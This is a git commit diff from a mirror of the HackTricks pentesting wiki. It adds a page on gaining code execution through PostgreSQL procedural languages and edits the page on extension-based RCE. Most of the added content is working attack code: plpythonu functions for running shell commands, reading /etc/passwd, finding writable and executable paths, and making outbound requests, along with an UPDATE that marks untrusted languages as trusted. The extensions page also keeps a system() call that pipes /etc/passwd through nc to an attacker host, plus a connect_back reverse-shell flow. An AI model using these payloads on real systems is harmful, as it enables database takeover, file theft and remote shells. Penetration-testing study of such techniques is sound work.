mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
GitBook: [#3644] No subject
This commit is contained in:
parent
671057fd88
commit
fad42dd59f
5 changed files with 321 additions and 33 deletions
|
@ -539,6 +539,7 @@
|
|||
* [PL/pgSQL Password Bruteforce](pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md)
|
||||
* [Network - Privesc, Port Scanner and NTLM chanllenge response disclosure](pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md)
|
||||
* [Big Binary Files Upload (PostgreSQL)](pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md)
|
||||
* [RCE with PostgreSQL Languages](pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md)
|
||||
* [RCE with PostgreSQL Extensions](pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md)
|
||||
* [SQLMap - Cheetsheat](pentesting-web/sql-injection/sqlmap/README.md)
|
||||
* [Second Order Injection - SQLMap](pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md)
|
||||
|
|
|
@ -65,7 +65,7 @@ SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
|
|||
# Get languages
|
||||
SELECT lanname,lanacl FROM pg_language;
|
||||
|
||||
# Sow installed extensions
|
||||
# Show installed extensions
|
||||
SHOW rds.extensions;
|
||||
```
|
||||
|
||||
|
|
|
@ -161,6 +161,12 @@ GRANT pg_execute_server_program TO username;
|
|||
Or use the `multi/postgres/postgres_copy_from_program_cmd_exec` module from **metasploit**.\
|
||||
More information about this vulnerability [**here**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). While reported as CVE-2019-9193, Postges declared this was a [feature and will not be fixed](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/).
|
||||
|
||||
### RCE with PostgreSQL Languages
|
||||
|
||||
{% content-ref url="rce-with-postgresql-languages.md" %}
|
||||
[rce-with-postgresql-languages.md](rce-with-postgresql-languages.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### RCE with PostgreSQL extensions
|
||||
|
||||
Once you have **learned** from the previous post **how to upload binary files** you could try obtain **RCE uploading a postgresql extension and loading it**.\
|
||||
|
|
|
@ -1,23 +1,18 @@
|
|||
|
||||
# RCE with PostgreSQL Extensions
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# PostgreSQL Extensions
|
||||
## PostgreSQL Extensions
|
||||
|
||||
PostgreSQL is designed to be easily extensible. For this reason, extensions loaded into the database can function just like features that are built in.\
|
||||
Extensions are modules that supply extra functions, operators, or types. They are libraries written in C.\
|
||||
|
@ -25,12 +20,12 @@ From PostgreSQL > 8.1 the extension libraries must be compiled with a especial h
|
|||
|
||||
Also, keep in mind that **if you don't know how to** [**upload files to the victim abusing PostgreSQL you should read this post.**](big-binary-files-upload-postgresql.md)
|
||||
|
||||
## RCE in Linux
|
||||
### RCE in Linux
|
||||
|
||||
The process for executing system commands from PostgreSQL 8.1 and before is straightforward and well documented ([Metasploit module](https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres\_payload)):
|
||||
|
||||
```c
|
||||
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
|
||||
```sql
|
||||
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
|
||||
SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
|
||||
```
|
||||
|
||||
|
@ -51,11 +46,11 @@ This error is explained in the [PostgreSQL documentation](https://www.postgresql
|
|||
|
||||
So for PostgreSQL versions since 8.2, an attacker either needs to take advantage of a library already present on the system, or upload their own library, which has been compiled against the right major version of PostgreSQL, and includes this magic block.
|
||||
|
||||
### Compile the library
|
||||
#### Compile the library
|
||||
|
||||
First of all you need to know the version of PostgreSQL running:
|
||||
|
||||
```bash
|
||||
```sql
|
||||
SELECT version();
|
||||
PostgreSQL 9.6.3 on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18) 6.3.0 20170516, 64-bit
|
||||
```
|
||||
|
@ -100,7 +95,7 @@ You can find this **library precompiled** to several different PostgreSQL versio
|
|||
|
||||
For more information read: [https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)
|
||||
|
||||
## RCE in Windows
|
||||
### RCE in Windows
|
||||
|
||||
The following DLL takes as input the **name of the binary** and the **number** of **times** you want to execute it and executes it:
|
||||
|
||||
|
@ -239,7 +234,7 @@ Note how in this case the **malicious code is inside the DllMain function**. Thi
|
|||
CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\shared\dummy_function.dll', 'dummy_function' LANGUAGE C STRICT;
|
||||
```
|
||||
|
||||
## RCE in newest Prostgres versions
|
||||
### RCE in newest Prostgres versions
|
||||
|
||||
On the **latest versions** of PostgreSQL, the `superuser` is **no** longer **allowed** to **load** a shared library file from **anywhere** else besides `C:\Program Files\PostgreSQL\11\lib` on Windows or `/var/lib/postgresql/11/lib` on \*nix. Additionally, this path is **not writable** by either the NETWORK\_SERVICE or postgres accounts.
|
||||
|
||||
|
@ -247,7 +242,7 @@ However, an authenticated database `superuser` **can write** binary files to the
|
|||
|
||||
The underlying issue is that the `CREATE FUNCTION` operative **allows for a directory traversal** to the data directory! So essentially, an authenticated attacker can **write a shared library file into the data directory and use the traversal to load the shared library**. This means an attacker can get native code execution and as such, execute arbitrary code.
|
||||
|
||||
### Attack flow
|
||||
#### Attack flow
|
||||
|
||||
First of all you need to **use large objects to upload the dll**. You can see how to do that here:
|
||||
|
||||
|
@ -306,21 +301,14 @@ print(" select lo_unlink(l.oid) from pg_largeobject_metadata l;")
|
|||
print(" drop function connect_back(text, integer);")
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -0,0 +1,293 @@
|
|||
# RCE with PostgreSQL Languages
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
## PostgreSQL Languages
|
||||
|
||||
The PostgreSQL database you got access to may have different **scripting languages installed** that you could abuse to **execute arbitrary code**.
|
||||
|
||||
You can **get them running**:
|
||||
|
||||
```sql
|
||||
SELECT lanname,lanpltrusted,lanacl FROM pg_language;
|
||||
```
|
||||
|
||||
Most of the scripting languages you can install in PostgreSQL have **2 falvours**: the **trusted** and the **untrusted**. The **untrusted** will have a name **ended in "u"** and will be the version that will allow you to **execute code** and use other interesting functions. This are languages that if installed are interesting:
|
||||
|
||||
* **plpythonu**
|
||||
* **perlu**
|
||||
* **javaU**
|
||||
* **plrubyu**
|
||||
* ... (any other programing language using an insecure version)
|
||||
|
||||
{% hint style="info" %}
|
||||
Note that it's posisble to compile the secure versions as "unsecure". Check [**this**](https://www.robbyonrails.com/articles/2005/08/22/installing-untrusted-pl-ruby-for-postgresql.html) for example. So it's always worth trying if you can execute code even if you only find installed the **trusted** one.
|
||||
{% endhint %}
|
||||
|
||||
If you find that an interesting language is **installed** but **untrusted** by PostgreSQL (`lanpltrusted` is `false`) you can try to **enable it** with:
|
||||
|
||||
```sql
|
||||
UPDATE pg_language SET lanpltrusted=true WHERE lanname='c';
|
||||
```
|
||||
|
||||
## plpythonu
|
||||
|
||||
{% tabs %}
|
||||
{% tab title="RCE" %}
|
||||
```sql
|
||||
CREATE OR REPLACE FUNCTION exec (cmd text)
|
||||
RETURNS VARCHAR(65535) stable
|
||||
AS $$
|
||||
import os
|
||||
return os.popen(cmd).read()
|
||||
#return os.execve(cmd, ["/usr/lib64/pgsql92/bin/psql"], {})
|
||||
$$
|
||||
LANGUAGE 'plpythonu';
|
||||
|
||||
SELECT cmd("ls"); #RCE with popen or execve
|
||||
```
|
||||
{% endtab %}
|
||||
|
||||
{% tab title="Get OS user" %}
|
||||
```sql
|
||||
CREATE OR REPLACE FUNCTION get_user (pkg text)
|
||||
RETURNS VARCHAR(65535) stable
|
||||
AS $$
|
||||
import os
|
||||
return os.getlogin()
|
||||
$$
|
||||
LANGUAGE 'plpythonu';
|
||||
|
||||
SELECT get_user(""); #Get user, para is useless
|
||||
```
|
||||
{% endtab %}
|
||||
|
||||
{% tab title="List dir" %}
|
||||
```sql
|
||||
CREATE OR REPLACE FUNCTION lsdir (dir text)
|
||||
RETURNS VARCHAR(65535) stable
|
||||
AS $$
|
||||
import json
|
||||
from os import walk
|
||||
files = next(walk(dir), (None, None, []))
|
||||
return json.dumps({"root": files[0], "dirs": files[1], "files": files[2]})[:65535]
|
||||
$$
|
||||
LANGUAGE 'plpythonu';
|
||||
|
||||
SELECT lsdir("/"); #List dir
|
||||
```
|
||||
{% endtab %}
|
||||
|
||||
{% tab title="Find W folder" %}
|
||||
```sql
|
||||
CREATE OR REPLACE FUNCTION findw (dir text)
|
||||
RETURNS VARCHAR(65535) stable
|
||||
AS $$
|
||||
import os
|
||||
def my_find(path):
|
||||
writables = []
|
||||
def find_writable(path):
|
||||
if not os.path.isdir(path):
|
||||
return
|
||||
if os.access(path, os.W_OK):
|
||||
writables.append(path)
|
||||
if not os.listdir(path):
|
||||
return
|
||||
else:
|
||||
for item in os.listdir(path):
|
||||
find_writable(os.path.join(path, item))
|
||||
find_writable(path)
|
||||
return writables
|
||||
|
||||
return ", ".join(my_find(dir))
|
||||
$$
|
||||
LANGUAGE 'plpythonu';
|
||||
|
||||
SELECT findw("/"); #Find Writable folders from a folder (recursively)
|
||||
```
|
||||
{% endtab %}
|
||||
|
||||
{% tab title="Find File" %}
|
||||
```sql
|
||||
CREATE OR REPLACE FUNCTION find_file (exe_sea text)
|
||||
RETURNS VARCHAR(65535) stable
|
||||
AS $$
|
||||
import os
|
||||
def my_find(path):
|
||||
executables = []
|
||||
def find_executables(path):
|
||||
if not os.path.isdir(path):
|
||||
executables.append(path)
|
||||
|
||||
if os.path.isdir(path):
|
||||
if not os.listdir(path):
|
||||
return
|
||||
else:
|
||||
for item in os.listdir(path):
|
||||
find_executables(os.path.join(path, item))
|
||||
find_executables(path)
|
||||
return executables
|
||||
|
||||
a = my_find("/")
|
||||
b = []
|
||||
|
||||
for i in a:
|
||||
if exe_sea in os.path.basename(i):
|
||||
b.append(i)
|
||||
return ", ".join(b)
|
||||
$$
|
||||
LANGUAGE 'plpythonu';
|
||||
|
||||
SELECT find_file("psql"); #Find a file
|
||||
```
|
||||
{% endtab %}
|
||||
|
||||
{% tab title="Find executables" %}
|
||||
```sql
|
||||
CREATE OR REPLACE FUNCTION findx (dir text)
|
||||
RETURNS VARCHAR(65535) stable
|
||||
AS $$
|
||||
import os
|
||||
def my_find(path):
|
||||
executables = []
|
||||
def find_executables(path):
|
||||
if not os.path.isdir(path) and os.access(path, os.X_OK):
|
||||
executables.append(path)
|
||||
|
||||
if os.path.isdir(path):
|
||||
if not os.listdir(path):
|
||||
return
|
||||
else:
|
||||
for item in os.listdir(path):
|
||||
find_executables(os.path.join(path, item))
|
||||
find_executables(path)
|
||||
return executables
|
||||
|
||||
a = my_find(dir)
|
||||
b = []
|
||||
|
||||
for i in a:
|
||||
b.append(os.path.basename(i))
|
||||
return ", ".join(b)
|
||||
$$
|
||||
LANGUAGE 'plpythonu';
|
||||
|
||||
SELECT findx("/"); #Find an executables in folder (recursively)
|
||||
```
|
||||
{% endtab %}
|
||||
|
||||
{% tab title="Find exec by subs" %}
|
||||
```sql
|
||||
CREATE OR REPLACE FUNCTION find_exe (exe_sea text)
|
||||
RETURNS VARCHAR(65535) stable
|
||||
AS $$
|
||||
import os
|
||||
def my_find(path):
|
||||
executables = []
|
||||
def find_executables(path):
|
||||
if not os.path.isdir(path) and os.access(path, os.X_OK):
|
||||
executables.append(path)
|
||||
|
||||
if os.path.isdir(path):
|
||||
if not os.listdir(path):
|
||||
return
|
||||
else:
|
||||
for item in os.listdir(path):
|
||||
find_executables(os.path.join(path, item))
|
||||
find_executables(path)
|
||||
return executables
|
||||
|
||||
a = my_find("/")
|
||||
b = []
|
||||
|
||||
for i in a:
|
||||
if exe_sea in i:
|
||||
b.append(i)
|
||||
return ", ".join(b)
|
||||
$$
|
||||
LANGUAGE 'plpythonu';
|
||||
|
||||
SELECT find_exe("psql"); #Find executable by susbstring
|
||||
```
|
||||
{% endtab %}
|
||||
|
||||
{% tab title="Read" %}
|
||||
```sql
|
||||
CREATE OR REPLACE FUNCTION read (path text)
|
||||
RETURNS VARCHAR(65535) stable
|
||||
AS $$
|
||||
import base64
|
||||
encoded_string= base64.b64encode(open(path).read())
|
||||
return encoded_string.decode('utf-8')
|
||||
return open(path).read()
|
||||
$$
|
||||
LANGUAGE 'plpythonu';
|
||||
|
||||
select read('/etc/passwd'); #Read a file in b64
|
||||
```
|
||||
{% endtab %}
|
||||
|
||||
{% tab title="Get perms" %}
|
||||
```sql
|
||||
CREATE OR REPLACE FUNCTION get_perms (path text)
|
||||
RETURNS VARCHAR(65535) stable
|
||||
AS $$
|
||||
import os
|
||||
status = os.stat(path)
|
||||
perms = oct(status.st_mode)[-3:]
|
||||
return str(perms)
|
||||
$$
|
||||
LANGUAGE 'plpythonu';
|
||||
|
||||
select get_perms("/etc/passwd"); # Get perms of file
|
||||
```
|
||||
{% endtab %}
|
||||
|
||||
{% tab title="Request" %}
|
||||
```sql
|
||||
CREATE OR REPLACE FUNCTION req2 (url text)
|
||||
RETURNS VARCHAR(65535) stable
|
||||
AS $$
|
||||
import urllib
|
||||
r = urllib.urlopen(url)
|
||||
return r.read()
|
||||
$$
|
||||
LANGUAGE 'plpythonu';
|
||||
|
||||
SELECT req2('https://google.com'); #Request using python2
|
||||
|
||||
CREATE OR REPLACE FUNCTION req3 (url text)
|
||||
RETURNS VARCHAR(65535) stable
|
||||
AS $$
|
||||
from urllib import request
|
||||
r = request.urlopen(url)
|
||||
return r.read()
|
||||
$$
|
||||
LANGUAGE 'plpythonu';
|
||||
|
||||
SELECT req3('https://google.com'); #Request using python3
|
||||
```
|
||||
{% endtab %}
|
||||
{% endtabs %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
Loading…
Reference in a new issue